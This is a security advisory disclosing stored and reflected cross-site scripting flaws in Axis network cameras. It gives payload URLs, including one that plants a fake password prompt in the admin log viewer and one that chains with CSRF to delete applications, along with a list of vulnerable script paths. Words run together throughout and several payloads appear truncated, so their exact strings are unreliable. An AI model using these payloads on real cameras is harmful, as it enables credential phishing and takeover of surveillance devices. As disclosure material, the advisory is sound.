Wednesday, May 17, 2017
II. Background--------------Axis is the market leader in network video, invented the world’s firstnetwork camera back in 1996 and we’ve been innovators in video surveillanceever since. Axis network video products are installed in public places andareas such as retail chains, airports, trains, motorways, universities,prisons, casinos and banks.III. vulnerability------------------AXIS Network Cameras are prone to multiple (stored/reflected) cross-sitescripting vulnerability.IV. technical details---------------------These attack vectors allow you to execute an arbitrary javascript code inthe user browser (session) with this steps:# 1 Attacker injects a javascript payload in the vulnerable page:http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=type="text/javascript>prompt("AXIS_PASSWORD:")This will create a entry in the genneral log file (/var/log/messages) So,when the user is viewing the log 'system options' -> 'support' -> 'Logs &Reports':http://{axishost}/axis-cgi/admin/systemlog.cgi?idwill be displayed a prompt for the password of the current user('AXIS_PASSWORD').However, due to CSRF presented is even possible to perform all actionsalready presented: create, edit and remove users and applications, etc. Forexample, to delete an application "axis_update" via SXSS:http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=* A reflected cross-site scripting affects all models of AXIS devices onthe same parameter:{axis-cam-model}/view/view.shtml?imagePath=0WLL |
# Other Vectors{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3Ehttp://{axishost}/view/custom_whiteBalance.shtml?imagePath=
onerror=alert(7) /><!--{axishost}/admin-bin/editcgi.cgi?file={axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis# SCRIPTPATHS:{HTMLROOT}/showReport.shtml{HTMLROOT}/config.shtml{HTMLROOT}/incl/top_incl.shtml{HTMLROOT}/incl/popup_header.shtml{HTMLROOT}/incl/page_header.shtml{HTMLROOT}/incl/top_incl_popup.shtml{HTMLROOT}/viewAreas.shtml{HTMLROOT}/vmd.shtml{HTMLROOT}/custom_whiteBalance.shtml{HTMLROOT}/playWindow.shtml{HTMLROOT}/incl/ptz_incl.shtml{HTMLROOT}/view.shtml{HTMLROOT}/streampreview.shtmlAnd many, many others...V. Impact---------allows to run arbitrary code on a victim's browser and computer if combinedwith another flaws in the same devices.VI. Affected products---------------------Multiple Axis Network products.VII. solution-------------It was not provided any solution to the problem.VIII. Credits-------------The vulnerability has been discovered by SmithW from OrwellLabsIX. Legal Notices-----------------The information contained within this advisory is supplied "as-is" with nowarranties or guarantees of fitness of use or otherwise. I accept noresponsibility for any damage caused by the use or misuse of thisinformation.X. Vendor solutions and workarounds-----------------------------------There was no response from the vendor.About Orwelllabs++++++++++++++++Orwelllabs is a (doubleplusungood) security research lab interested in embeddeddevice & webapp hacking.
Subscribe to:
Comments (Atom)